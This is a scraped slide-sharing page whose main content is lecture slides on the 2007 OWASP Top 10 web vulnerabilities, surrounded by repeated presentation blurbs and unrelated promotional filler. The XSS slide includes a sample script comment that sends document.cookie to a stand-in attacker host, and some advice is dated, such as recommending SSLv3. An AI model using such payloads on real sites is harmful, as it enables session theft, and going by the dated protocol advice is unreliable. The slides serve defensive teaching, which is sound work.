The document discusses the Open Web Application Security Project (OWASP) and its Top 10 vulnerabilities. OWASP is an open source non-profit organization dedicated to web application security. The document outlines the OWASP Top 10 vulnerabilities from 2007, including Cross-Site Scripting (XSS), Injection Flaws, Malicious File Execution, and others. It then provides detailed explanations and examples of each vulnerability, as well as recommendations for prevention and mitigation.
Application Security Vulnerabilities: OWASP Top 10 -2007Vaibhav Gupta
General concepts of web application security vulnerabilities primarily based on OWASP Top 10 list-2007(I know its too old :-))
I, along with Sandeep and Vishal, presented on this at IIIT-Delhi college in April, 2014
The Open Web Application Security Project, is an online community that produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security.
One of those projects, The OWASP Top Ten, provides a powerful awareness document for web application security. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.
The OWASP team recently released the 2017 revised and updated version of the ten most critical web application security risks and so we’ve created these flash cards for you, your friends, and your colleagues (especially product and engineering :) to test your knowledge and learn more about these important issues.
Company-wide security awareness is a powerful way to improve the overall security of your organization. So adorn your waiting rooms, cubicles, and snack rooms with these flash cards for easy learning and remembrance.
+ Background & Basics of Web App Security, The HTTP Protocol, Web.
+ Application Insecurities, OWASP Top 10 Vulnerabilities (XSS, SQL Injection, CSRF, etc.)
+ Web App Security Tools (Scanners, Fuzzers, etc), Remediation of Web App
+ Vulnerabilities, Web Application Audits and Risk Assessment.
Web Application Security 101 was conducted by:
Vaibhav Gupta, Vishal Ashtana, Sandeep Singh from Null.
Application Security Vulnerabilities: OWASP Top 10 -2007Vaibhav Gupta
General concepts of web application security vulnerabilities primarily based on OWASP Top 10 list-2007(I know its too old :-))
I, along with Sandeep and Vishal, presented on this at IIIT-Delhi college in April, 2014
The Open Web Application Security Project, is an online community that produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security.
One of those projects, The OWASP Top Ten, provides a powerful awareness document for web application security. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.
The OWASP team recently released the 2017 revised and updated version of the ten most critical web application security risks and so we’ve created these flash cards for you, your friends, and your colleagues (especially product and engineering :) to test your knowledge and learn more about these important issues.
Company-wide security awareness is a powerful way to improve the overall security of your organization. So adorn your waiting rooms, cubicles, and snack rooms with these flash cards for easy learning and remembrance.
+ Background & Basics of Web App Security, The HTTP Protocol, Web.
+ Application Insecurities, OWASP Top 10 Vulnerabilities (XSS, SQL Injection, CSRF, etc.)
+ Web App Security Tools (Scanners, Fuzzers, etc), Remediation of Web App
+ Vulnerabilities, Web Application Audits and Risk Assessment.
Web Application Security 101 was conducted by:
Vaibhav Gupta, Vishal Ashtana, Sandeep Singh from Null.
A walkthrough of web application defense strategies, based around the Open Web Application Security Project's top 10 list. Presented to the Classic City Developers Meetup in August 2017.
The OWASP Top Ten is the de-facto web application security standard because it reflects the evolving threat landscape, providing organizations a framework to manage and mitigate application security risk.
This presentation examines the critical newcomers and pesky incumbents from both an offensive and defensive perspective. Our experts share their insight on how to harden Web applications and align your program towards OWASP compliance.
OWASP Top 10 Vulnerabilities 2017- AppTranaIshan Mathur
Our latest OWASP Top Vulnerabilities Guide updated for new 2017 issues serves as a practical guide to understanding OWASP Top 10 vulnerabilities and preparing a response plan to counter these vulnerabilities.
Secure web programming plus end users' awareness are the last line of defense against attacks targeted at the corporate systems, particularly web applications, in the era of world-wide web.
Most web application attacks occur through Cross Site Scripting (XSS), and SQL Injection. On the other hand, most web application vulnerabilities arise from weak coding with failure to properly validate users' input, and failure to properly sanitize output while displaying the data to the visitors.
The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, and 15% insufficient authentication, and others.
Abdul Rahman Sherzad, lecturer at Computer Science Faculty of Herat University, and Ph.D. student at Technical University of Berlin gave a presentation at 12th IT conference on Higher Education for Afghanistan in MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan introducing web application security threats by demonstrating the security problems that exist in corporate systems with a strong emphasis on secure development. Major security vulnerabilities, secure design and coding best practices when designing and developing web-based applications were covered.
The main objective of the presentation was raising awareness about the problems that might occur in web-application systems, as well as secure coding practices and principles. The presentation's aims were to build security awareness for web applications, to discuss the threat landscape and the controls users should use during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.
OWASP Top 10 2017 - New VulnerabilitiesDilum Bandara
New Vulnerabilities introduced in OWASP Top 10 2017. Cover Broken Access Control ,
XML External Entities (XXE), Insecure Deserialization, and Insufficient Logging & Monitoring, as well as solutions
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
A presentation of the OWASP Top 10 2017 release candidate, expected to be finalized in summer 2017. Presented at the St. Louis CYBER meetup on Wednesday, June 7, 2017.
The Open Web Application Security Project is an online community that produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security
Oh, WASP! Security Essentials for Web AppsTechWell
The past few years have seen a rapid increase in business efficiency through Web-based applications. Unfortunately, a dramatic increase in the number of web application vulnerabilities has followed. Insecure web applications can be disastrous for mission critical businesses and users' sensitive data. More than 70 percent of security vulnerabilities are due to flaws in the application rather than firewall breaches. Bennie Paul explains how security testing has become an indispensable part of the SDLC for businesses operating online today. OWASP (Open Web Application Security Project) provides open source tools, code, and materials to develop, test, and maintain application security. Monitoring the “OWASP Top 10” web application security flaws is highly recommended as part of an organization’s testing methodology. Vulnerabilities identified are compared against the organization’s security objectives and regulations, and categorized accordingly for remediation. Benny guides you through the OWASP vulnerabilities, technique, framework, and preventive measures that you can adopt for building better software.
Session on OWASP Top 10 Vulnerabilities presented by Aarti Bala and Saman Fatima. The session covered the below 4 vulnerabilities -
Injection,
Sensitive Data Exposure
Cross Site Scripting
Insufficient Logging and Monitoring
A walkthrough of web application defense strategies, based around the Open Web Application Security Project's top 10 list. Presented to the Classic City Developers Meetup in August 2017.
The OWASP Top Ten is the de-facto web application security standard because it reflects the evolving threat landscape, providing organizations a framework to manage and mitigate application security risk.
This presentation examines the critical newcomers and pesky incumbents from both an offensive and defensive perspective. Our experts share their insight on how to harden Web applications and align your program towards OWASP compliance.
OWASP Top 10 Vulnerabilities 2017- AppTranaIshan Mathur
Our latest OWASP Top Vulnerabilities Guide updated for new 2017 issues serves as a practical guide to understanding OWASP Top 10 vulnerabilities and preparing a response plan to counter these vulnerabilities.
Secure web programming plus end users' awareness are the last line of defense against attacks targeted at the corporate systems, particularly web applications, in the era of world-wide web.
Most web application attacks occur through Cross Site Scripting (XSS), and SQL Injection. On the other hand, most web application vulnerabilities arise from weak coding with failure to properly validate users' input, and failure to properly sanitize output while displaying the data to the visitors.
The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, and 15% insufficient authentication, and others.
Abdul Rahman Sherzad, lecturer at Computer Science Faculty of Herat University, and Ph.D. student at Technical University of Berlin gave a presentation at 12th IT conference on Higher Education for Afghanistan in MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan introducing web application security threats by demonstrating the security problems that exist in corporate systems with a strong emphasis on secure development. Major security vulnerabilities, secure design and coding best practices when designing and developing web-based applications were covered.
The main objective of the presentation was raising awareness about the problems that might occur in web-application systems, as well as secure coding practices and principles. The presentation's aims were to build security awareness for web applications, to discuss the threat landscape and the controls users should use during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.
OWASP Top 10 2017 - New VulnerabilitiesDilum Bandara
New Vulnerabilities introduced in OWASP Top 10 2017. Cover Broken Access Control ,
XML External Entities (XXE), Insecure Deserialization, and Insufficient Logging & Monitoring, as well as solutions
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
A presentation of the OWASP Top 10 2017 release candidate, expected to be finalized in summer 2017. Presented at the St. Louis CYBER meetup on Wednesday, June 7, 2017.
The Open Web Application Security Project is an online community that produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security
Oh, WASP! Security Essentials for Web AppsTechWell
The past few years have seen a rapid increase in business efficiency through Web-based applications. Unfortunately, a dramatic increase in the number of web application vulnerabilities has followed. Insecure web applications can be disastrous for mission critical businesses and users' sensitive data. More than 70 percent of security vulnerabilities are due to flaws in the application rather than firewall breaches. Bennie Paul explains how security testing has become an indispensable part of the SDLC for businesses operating online today. OWASP (Open Web Application Security Project) provides open source tools, code, and materials to develop, test, and maintain application security. Monitoring the “OWASP Top 10” web application security flaws is highly recommended as part of an organization’s testing methodology. Vulnerabilities identified are compared against the organization’s security objectives and regulations, and categorized accordingly for remediation. Benny guides you through the OWASP vulnerabilities, technique, framework, and preventive measures that you can adopt for building better software.
Session on OWASP Top 10 Vulnerabilities presented by Aarti Bala and Saman Fatima. The session covered the below 4 vulnerabilities -
Injection,
Sensitive Data Exposure
Cross Site Scripting
Insufficient Logging and Monitoring
this is my project idea. i did my project based on this only
main aim is to detect virus from ip and clear the prosess and to sever.
so if you want to enhance this do some extensions whatever your idea.
The goal of the Top 10 project is to raise awareness about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more. This release of the OWASP Top 10 marks this project’s eighth year of raising awareness of the importance of application security risks. The OWASP Top 10 was first released in 2003, minor updates were made in 2004 and 2007, and this is the 2010 release.
My presentation about Web Apps security threats. Macedonian Code Camp conference 2013.
“Every program has at least two purposes: the one for which it was written, and another for which it wasn't.”
-Alan J. Perlis
OWASP is stand as Open Web Application Security Project which define the top 10 most vulnerabilities related with website and their exploit.
Every slide have description with their particular vulnerabilities and their impact also.
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Braindev Kyiv
Sergey Kochergan is QA Engineer at Luxoft with extensive experience in software engineering and security field. As an independent consultant, he has provided strategic expertise to business clients with frameworks for SCADA security policy, organazied hackatons and ctf events. Sergey was involved into R&D projects of System Design for SDR communication hardware, network forensics with IDS.
In this lecture Sergey will tell the audience about Security in general, will make overview of nowadays Web Testing Environment and also will present his vision of Risk Rating Methodology and Vulnerability Patterns.
For our next events join us:
http://www.meetup.com/Kyiv-Dev-Meetup-SmartMonday/
https://www.facebook.com/braindevkyiv
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
With the release of the OWASP TOP 10 2017 we saw new issues rise as contenders of most common issues in the web landscape. Much of the OWASP documentation displays issues, and remediation advice/code relating to Java, C++, and C#; however not much relating to JavaScript. JavaScript has drastically changed over the last few years with the release of Angular, React, and Vue, alongside the popular use of NodeJS and its libraries/frameworks. This talk will introduce you to the OWASP Top 10 explaining JavaScript client and server-side vulnerabilities.
International Journal of Engineering Research and Applications (IJERA) is an open access online peer reviewed international journal that publishes research and review articles in the fields of Computer Science, Neural Networks, Electrical Engineering, Software Engineering, Information Technology, Mechanical Engineering, Chemical Engineering, Plastic Engineering, Food Technology, Textile Engineering, Nano Technology & science, Power Electronics, Electronics & Communication Engineering, Computational mathematics, Image processing, Civil Engineering, Structural Engineering, Environmental Engineering, VLSI Testing & Low Power VLSI Design etc.
OWASP is an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security.
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
A live hacking session demonstrating the different tools and techniques used by hackers and an in-depth understanding of the problems of insecure application and the solutions to solve the vulnerability.
# Internet Security: Safeguarding Your Digital World
In the contemporary digital age, the internet is a cornerstone of our daily lives. It connects us to vast amounts of information, provides platforms for communication, enables commerce, and offers endless entertainment. However, with these conveniences come significant security challenges. Internet security is essential to protect our digital identities, sensitive data, and overall online experience. This comprehensive guide explores the multifaceted world of internet security, providing insights into its importance, common threats, and effective strategies to safeguard your digital world.
## Understanding Internet Security
Internet security encompasses the measures and protocols used to protect information, devices, and networks from unauthorized access, attacks, and damage. It involves a wide range of practices designed to safeguard data confidentiality, integrity, and availability. Effective internet security is crucial for individuals, businesses, and governments alike, as cyber threats continue to evolve in complexity and scale.
### Key Components of Internet Security
1. **Confidentiality**: Ensuring that information is accessible only to those authorized to access it.
2. **Integrity**: Protecting information from being altered or tampered with by unauthorized parties.
3. **Availability**: Ensuring that authorized users have reliable access to information and resources when needed.
## Common Internet Security Threats
Cyber threats are numerous and constantly evolving. Understanding these threats is the first step in protecting against them. Some of the most common internet security threats include:
### Malware
Malware, or malicious software, is designed to harm, exploit, or otherwise compromise a device, network, or service. Common types of malware include:
- **Viruses**: Programs that attach themselves to legitimate software and replicate, spreading to other programs and files.
- **Worms**: Standalone malware that replicates itself to spread to other computers.
- **Trojan Horses**: Malicious software disguised as legitimate software.
- **Ransomware**: Malware that encrypts a user's files and demands a ransom for the decryption key.
- **Spyware**: Software that secretly monitors and collects user information.
### Phishing
Phishing is a social engineering attack that aims to steal sensitive information such as usernames, passwords, and credit card details. Attackers often masquerade as trusted entities in email or other communication channels, tricking victims into providing their information.
### Man-in-the-Middle (MitM) Attacks
MitM attacks occur when an attacker intercepts and potentially alters communication between two parties without their knowledge. This can lead to the unauthorized acquisition of sensitive information.
### Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks
1.Wireless Communication System_Wireless communication is a broad term that i...JeyaPerumal1
Wireless communication involves the transmission of information over a distance without the help of wires, cables or any other forms of electrical conductors.
Wireless communication is a broad term that incorporates all procedures and forms of connecting and communicating between two or more devices using a wireless signal through wireless communication technologies and devices.
Features of Wireless Communication
The evolution of wireless technology has brought many advancements with its effective features.
The transmitted distance can be anywhere between a few meters (for example, a television's remote control) and thousands of kilometers (for example, radio communication).
Wireless communication can be used for cellular telephony, wireless access to the internet, wireless home networking, and so on.
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBrad Spiegel Macon GA
Brad Spiegel Macon GA’s journey exemplifies the profound impact that one individual can have on their community. Through his unwavering dedication to digital inclusion, he’s not only bridging the gap in Macon but also setting an example for others to follow.
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC
Ellisha Heppner, Grant Management Lead, presented an update on APNIC Foundation to the PNG DNS Forum held from 6 to 10 May, 2024 in Port Moresby, Papua New Guinea.
This 7-second Brain Wave Ritual Attracts Money To You.!nirahealhty
Discover the power of a simple 7-second brain wave ritual that can attract wealth and abundance into your life. By tapping into specific brain frequencies, this technique helps you manifest financial success effortlessly. Ready to transform your financial future? Try this powerful ritual and start attracting money today!
2. What is OWASP?What is OWASP?
Open Web Application Security Project
An all-volunteer group, a not-for-profit
charitable organization
Produces free, professional-quality, open-
source documentation, tools, and standards
Dedicated to helping organizations understand
and improve the security of their web
application.
Facilitates conferences, local chapters, articles,
papers, and message forums
IFETCE/M.E CSE/NE7202-NIS/Unit 4 2
3. OWASP 2007 Top Ten ListOWASP 2007 Top Ten List
A1. Cross-Site Scripting (XSS)
A2. Injections Flaws
A3. Malicious File Execution
A4. Insecure Direct Object Reference
A5. Cross Site Request Forgery (CSRF)
A6. Information Leakage & Improper Error
Handling
A7. Broken Authentication & Session
Management
A8. Insecure Cryptographic Storage
A9. Insecure Communications
A10. Failure to Restrict URL Access
IFETCE/M.E CSE/NE7202-NIS/Unit 4 3
4. A1. Cross-Site Scripting (XSS) FlawsA1. Cross-Site Scripting (XSS) Flaws
OWASP Definition
XSS flaws occur whenever an application takes user
supplied data and sends it to a web browser without
first validating or encoding that content. XSS allows
attackers to execute script in the victim's browser
which can hijack user sessions, deface web sites,
possibly introduce worms, etc.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 4
5. A1. Cross-Site Scripting (XSS) AttacksA1. Cross-Site Scripting (XSS) Attacks
3 Categories of XSS attacks:
◦ Stored - the injected code is permanently stored
(in a database, message forum, visitor log, etc.)
◦ Reflected - attacks that are reflected take some other
route to the victim (through an e-mail message, or
bounced off from some other server)
◦ DOM injection – Injected code manipulates sites
javascript code or variables, rather than HTML objects.
Example Comment embedded with JavaScript
comment=“Nice site! <SCRIPT> window.open(
http://badguy.com/info.pl?document.cookie </SCRIPT>
IFETCE/M.E CSE/NE7202-NIS/Unit 4 5
6. A1. Cross-Site Scripting (XSS)A1. Cross-Site Scripting (XSS)
Occurs when an attacker can manipulate a Web application to
send malicious scripts to a third party (also known as XSS).
This is usually done when there is a location that arbitrary content
can be entered into (such as an e-mail message, or free text field
for example) and then referenced by the target of the attack.
The attack typically takes the form of an HTML tag (frequently a
hyperlink) that contains malicious scripting (often JavaScript).
The target of the attack trusts the Web application and thus XSS
attacks exploit that trust to do things that would not normally be
allowed.
The use of Unicode and other methods of encoding the malicious
portion of the tag are often used so the request looks less
suspicious to the target user or to evade IDS/IPS.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 6
8. XSS - ProtectionXSS - Protection
Protect your application from XSS attacks
Filter output by converting text/data which might
have dangerous HTML characters to its encoded
format:
◦ '<' and '>' to '<' and '>’
◦ '(' and ')' to '(' and ')’
◦ '#' and '&' to '#' and '&‘
Recommend filtering on input as much as possible.
(some data may need to allow special characters.)
IFETCE/M.E CSE/NE7202-NIS/Unit 4 8
9. A2. Injections FlawsA2. Injections Flaws
OWASP Definition:
Injection flaws, particularly SQL injection, are
common in web applications. Injection occurs when
user-supplied data is sent to an interpreter as part of
a command or query. The attacker’s hostile data
tricks the interpreter into executing unintended
commands or changing data.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 9
10. A2. Injections FlawsA2. Injections Flaws
Some common types of command injection flaws include:
◦ SQL injection (malicious calls to backend databases
via SQL), using shell commands to run external
programs
◦ Using system calls to in turn make calls to the
operating system.
Any Web application that relies on the use of an
interpreter has the potential to fall victim to this type of
flaw
IFETCE/M.E CSE/NE7202-NIS/Unit 4 10
11. A2. Injections Flaws: ProtectionA2. Injections Flaws: Protection
Use language specific libraries to perform the same
functions as shell commands and system calls
Check for existing reusable libraries to validate input,
and safely perform system functions, or develop your
own.
Perform design and code reviews on the reusable
libraries to ensure security.
Other common methods of protection include:
◦ Data validation (to ensure input isn't malicious code),
◦ Run commands with very minimal privileges
◦ If the application is compromised, the damage will be
minimized.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 11
12. A3. Malicious File ExecutionA3. Malicious File Execution
OWASP Definition:
Code vulnerable to remote file inclusion (RFI)
allows attackers to include hostile code and data,
resulting in devastating attacks, such as total server
compromise.
Malicious file execution attacks affect PHP, XML
and any framework which accepts filenames or files
from users.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 12
13. A3. Malicious File ExecutionA3. Malicious File Execution
Applications which allow the user to provide
a filename, or part of a filename are often
vulnerable is input is not carefully validated.
Allowing the attacker to manipulate the
filename may cause application to execute a
system program or external URL.
Applications which allow file uploads have
additional risks
◦ Place executable code into the application
◦ Replace a Session file, log file or authentication
token
IFETCE/M.E CSE/NE7202-NIS/Unit 4 13
14. A3. Malicious File Execution ProtectionA3. Malicious File Execution Protection
Do not allow user input to be used for any part of a
file or path name.
Where user input must influences a file name or URL,
use a fully enumerated list to positively validate the
value.
File uploads have to be done VERY carefully.
◦ Only allow uploads to a path outside of the webroot so
it can not be executed
◦ Validate the file name provided so that a directory path
is not included.
◦ Implement or enable sandbox or chroot controls which
limit the applications access to files.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 14
15. A4. Insecure Direct Object ReferenceA4. Insecure Direct Object Reference
OWASP Definition:
A direct object reference occurs when a developer
exposes a reference to an internal implementation
object, such as a file, directory, database record, or
key, as a URL or form parameter. Attackers can
manipulate those references to access other
objects without authorization.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 15
16. A4. Insecure Direct Object ReferenceA4. Insecure Direct Object Reference
Applications often expose internal objects,
making them accessible via parameters.
When those objects are exposed, the attacker
may manipulate unauthorized objects, if proper
access controls are not in place.
Internal Objects might include
◦ Files or Directories
◦ URLs
◦ Database key, such as acct_no, group_id etc.
◦ Other Database object names such as table name
IFETCE/M.E CSE/NE7202-NIS/Unit 4 16
17. A4. Insecure Direct Object ReferenceA4. Insecure Direct Object Reference
ProtectionProtection
Do not expose direct objects via parameters
Use an indirect mapping which is simple to
validate.
Consider using a mapped numeric range, file=1
or 2 …
Re-verify authorization at every reference.
For example:
1. Application provided an initial lists of only the
authorized options.
2. When user’s option is “submitted” as a parameter,
authorization must be checked again.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 17
18. A5. Cross Site Request Forgery (CSRF)A5. Cross Site Request Forgery (CSRF)
OWASP Definition:
A CSRF attack forces a logged-on victim’s browser
to send a pre-authenticated request to a vulnerable
web application, which then forces the victim’s
browser to perform a hostile action to the benefit
of the attacker. CSRF can be as powerful as the
web application that it attacks.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 18
19. A5. Cross Site Request Forgery (CSRF)A5. Cross Site Request Forgery (CSRF)
Applications are vulnerable if any of following:
◦ Does not re-verify authorization of action
◦ Default login/password will authorize action
◦ Action will be authorized based only on credentials
which are automatically submitted by the browser
such as session cookie, Kerberos token, basic
authentication, or SSL certificate etc.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 19
20. A5. Cross Site Request Forgery (CSRF)A5. Cross Site Request Forgery (CSRF)
ProtectionProtection
Eliminate any Cross Site Scripting
vulnerabilities
◦ Not all CSRF attacks require XSS
◦ However XSS is a major channel for delivery of CSRF
attacks
Generate unique random tokens for each
form or URL, which are not automatically
transmitted by the browser.
Do not allow GET requests for sensitive
actions.
For sensitive actions, re-authenticate or
digitally sign the transaction.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 20
21. OWASP A6. Information Leakage & ImproperOWASP A6. Information Leakage & Improper
Error HandlingError Handling
OWASP Definition:
Applications can unintentionally leak information
about their configuration, internal workings, or
violate privacy through a variety of application
problems. Attackers use this weakness to steal
sensitive data or conduct more serious attacks.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 21
22. Improper Error Handling ExamplesImproper Error Handling Examples
Example 1
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access 97 Driver] Can't open database ‘VDPROD'.
Example 2
java.sql.SQLException: ORA-00600: internal error code, arguments: [ttcgnd-1],
[0], [], [], [],
at oracle.jdbc.dbaccess.DBError.throwSqlException (DBError.java:169)
at oracle.jdbc.ttc7.TTIoer.processError (TTIoer.java:208)
Messages Helpful for Debug
Provides way too much information!
Very helpful to potential attacker
IFETCE/M.E CSE/NE7202-NIS/Unit 4 22
23. Improper Error Handling: ProtectionImproper Error Handling: Protection
Prevent display of detailed internal error messages including stack traces,
messages with database or table names, protocols, and other error codes.
(This can provide attackers clues as to potential flaws.)
Good error handling systems should always enforce the security scheme in
place while still being able to handle any feasible input.
Provide short error messages to the user while logging detailed error
information to an internal log file.
◦ Diagnostic information is available to site maintainers
◦ Vague messages indicating an internal failure provided to the users
Provide just enough information to allow what is reported by the user to be
able to linked the internal error logs. For example: System Time-stamp,
client IP address, and URL
IFETCE/M.E CSE/NE7202-NIS/Unit 4 23
24. Information Leakage - ExampleInformation Leakage - Example
Sensitive information can be leaked very subtlety
Very Common Example - Account Harvesting
◦ App. Responds differently to a valid user name with an invalid
password, then to a invalid user name
◦ Web Application discloses which logins are valid vs. which are
invalid, and allows accounts to be guessed and harvested.
◦ Provides the attacker with an important initial piece of
information, which may then be followed with password
guessing.
◦ Difference in the Web App response may be:
Intentional (Easier to for users to tell then the account is
wrong)
Different code included in URL, or in a hidden field
Any Minor difference in the HTML is sufficient
Differences in timing are also common and may be used!
IFETCE/M.E CSE/NE7202-NIS/Unit 4 24
25. Information Leakage: ProtectionsInformation Leakage: Protections
Ensure sensitive responses with multiple
outcomes return identical results
Save the the different responses and diff the
html, the http headers & URL.
Ensure error messages are returned in roughly
the same time. or consider imposing a random
wait time for all transactions to hide this detail
from the attacker.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 25
26. A7. Broken Authentication and SessionA7. Broken Authentication and Session
ManagementManagement
OWASP Definition:
Account credentials and session tokens are
often not properly protected. Attackers
compromise passwords, keys, or
authentication tokens to assume other users’
identities.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 26
27. Session ManagementSession Management
HTTP/s Protocol does not provide tracking of a users
session.
Session tracking answers the question:
◦ After a user authenticates how does the server
associate subsequent requests to the authenticated
user?
Typically, Web Application Vendors provide a built-in
session tracking, which is good if used properly.
Often developers will make the mistake of inventing
their own session tracking.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 27
28. Session Management (Session IDs)Session Management (Session IDs)
A Session ID
Unique to the User
Used for only one authenticated session
Generated by the server
Sent to the client as
◦ Hidden variable,
◦ HTTP cookie,
◦ URL query string (not a good practice)
The user is expected to send back the same ID in the
next request.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 28
29. Session Management (Session Hijacking)Session Management (Session Hijacking)
Session ID is disclosed or is guessed.
An attacker using the same session ID has the same
privileges as the real user.
Especially useful to an attacker if the session is
privileged.
Allows initial access to the Web application to be
combined with other attacks.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 29
30. Session Management: ProtectionSession Management: Protection
Use long complex random session ID that cannot be
guessed.
Protect the transmission and storage of the Session ID to
prevent disclosure and hijacking.
A URL query string should not be used for Session ID or
any User/Session information
◦ URL is stored in browser cache
◦ Logged via Web proxies and stored in the proxy cache
Example:
https://www.example.net/servlet/login?userid=ralph&
password=dumb
IFETCE/M.E CSE/NE7202-NIS/Unit 4 30
31. Session Management: ProtectionSession Management: Protection
Entire session should be transmitted via HTTPS to
prevent disclosure of the session ID. (Not just the
authentication)
Avoid or protect any session information transmitted
to/from the client.
Session ID should expire and/or time-out on the
Server when idle or on logout.
Client side cookie expirations useful, but not trusted.
Consider regenerating a new session upon successful
authentication or privilege level change.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 31
32. Session Management: ProtectionSession Management: Protection
Example Session ID using cookie
Set-Cookie:
siteid=91d3dc13713aa579d0f148972384f4;
path=/;
expires=Wednesday, 22-Oct-2006 02:12:40
domain=.www.rd1.net
secure
Cookie: siteid=91d3dc13713aa579d0f148972384f4
IFETCE/M.E CSE/NE7202-NIS/Unit 4 32
33. Broken Account ManagementBroken Account Management
Even valid authentication schemes can be undermined by
flawed account management functions including:
Account update
Forgotten password recovery or reset
Change password, and other similar functions
IFETCE/M.E CSE/NE7202-NIS/Unit 4 33
34. Broken Account and Session Management:Broken Account and Session Management:
ProtectionProtection
Password Change Controls - require users to provide
both old and new passwords
Forgotten Password Controls - if forgotten passwords
are emailed to users, they should be required to re-
authenticate whenever they attempt to change their email
address.
Password Strength - require at least 7 characters, with
letters, numbers, and special characters both upper case
and lower case.
Password Expiration - Users must change passwords
every 90 days, and administrators every 30 days.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 34
35. Broken Account and Session Management:Broken Account and Session Management:
ProtectionProtection
Password Storage - never store passwords in plain text.
Passwords should always be stored in either hashed
(preferred) or encrypted form.
Protecting Credentials in Transit - to prevent "man-in-
the-middle" attacks the entire authenticated session /
transaction should be encrypted SSLv3 or TLSv1
Man-in-the-middle attacks - are still possible with SSL if
users disable or ignore warnings about invalid SSL certificates.
Replay attacks - Transformations such as hashing on the
client side provide little protection as the hashed version can
simply be intercepted and retransmitted so that the actual
plain text password is not needed.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 35
36. A8. Insecure Cryptographic StorageA8. Insecure Cryptographic Storage
OWASP Definition:
Web applications rarely use cryptographic functions
properly to protect data and credentials. Attackers
use weakly protected data to conduct identity theft
and other crimes, such as credit card fraud.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 36
37. OWASP A8. Insecure Cryptographic StorageOWASP A8. Insecure Cryptographic Storage
The majority of Web applications in use today need
to store sensitive information (passwords, credit card
numbers, proprietary information, etc.) in a secure
fashion.
The use of encryption has become relatively easy for
developers to incorporate.
Proper utilization of cryptography, however, can
remain elusive by developers overestimating the
protection provided by encryption, and
underestimating the difficulties of proper
implementation and protecting the keys.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 37
38. Insecure Cryptographic Storage: CommonInsecure Cryptographic Storage: Common
MistakesMistakes
Improper/insecure storage of passwords,
certifications, and keys
Poor choice of algorithm
Poor source of randomness for initialization vectors
Attempting to develop a new encryption scheme "in
house” (Always a BAD idea)
Failure to provide functionality to change encryption
keys
IFETCE/M.E CSE/NE7202-NIS/Unit 4 38
39. Insecure Cryptographic Storage: ProtectionInsecure Cryptographic Storage: Protection
Avoiding storing sensitive information when possible
Use only approved standard algorithms
Use platform specific approved storage mechanisms
Ask, read and learn about coding Best Practices for
your platform
Careful review of all system designs
Beware of transparent and automated encryption
solutions, as they are typically just as transparent to
the attacker.
Source code reviews
IFETCE/M.E CSE/NE7202-NIS/Unit 4 39
40. A9. Insecure CommunicationsA9. Insecure Communications
OWASP Definition:
Applications frequently fail to encrypt network traffic
when it is necessary to protect sensitive
communications.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 40
41. Insecure CommunicationsInsecure Communications
Failure to encrypt network traffic leaves the
information available to be sniffed from any
compromised system/device on the network.
Switched networks do not provide adequate
protection.
SSL Man-in-the-Middle attacks
IFETCE/M.E CSE/NE7202-NIS/Unit 4 41
42. Insecure Communications: ProtectionInsecure Communications: Protection
Use SSL/TLS for ALL connections that are
authenticated or transmitting sensitive information
Use SSL/TLS for mid-tier and internal network
communications between Web Server, Application
and database.
Configure Desktop Clients and Servers to ensure
only SSLv3 and TLSv1 are used with strong ciphers.
Use only valid trusted SSL/TLS certificates and train
users to expect valid certificates to prevent Man-in-
the-Middle attacks.
IFETCE/M.E CSE/NE7202-NIS/Unit 4 42
43. A10. Failure to Restrict URL AccessA10. Failure to Restrict URL Access
OWASP Definition:
Frequently, an application only protects sensitive
functionality by preventing the display of links or
URLs to unauthorized users. Attackers can use this
weakness to access and perform unauthorized
operations by accessing those URLs directly.
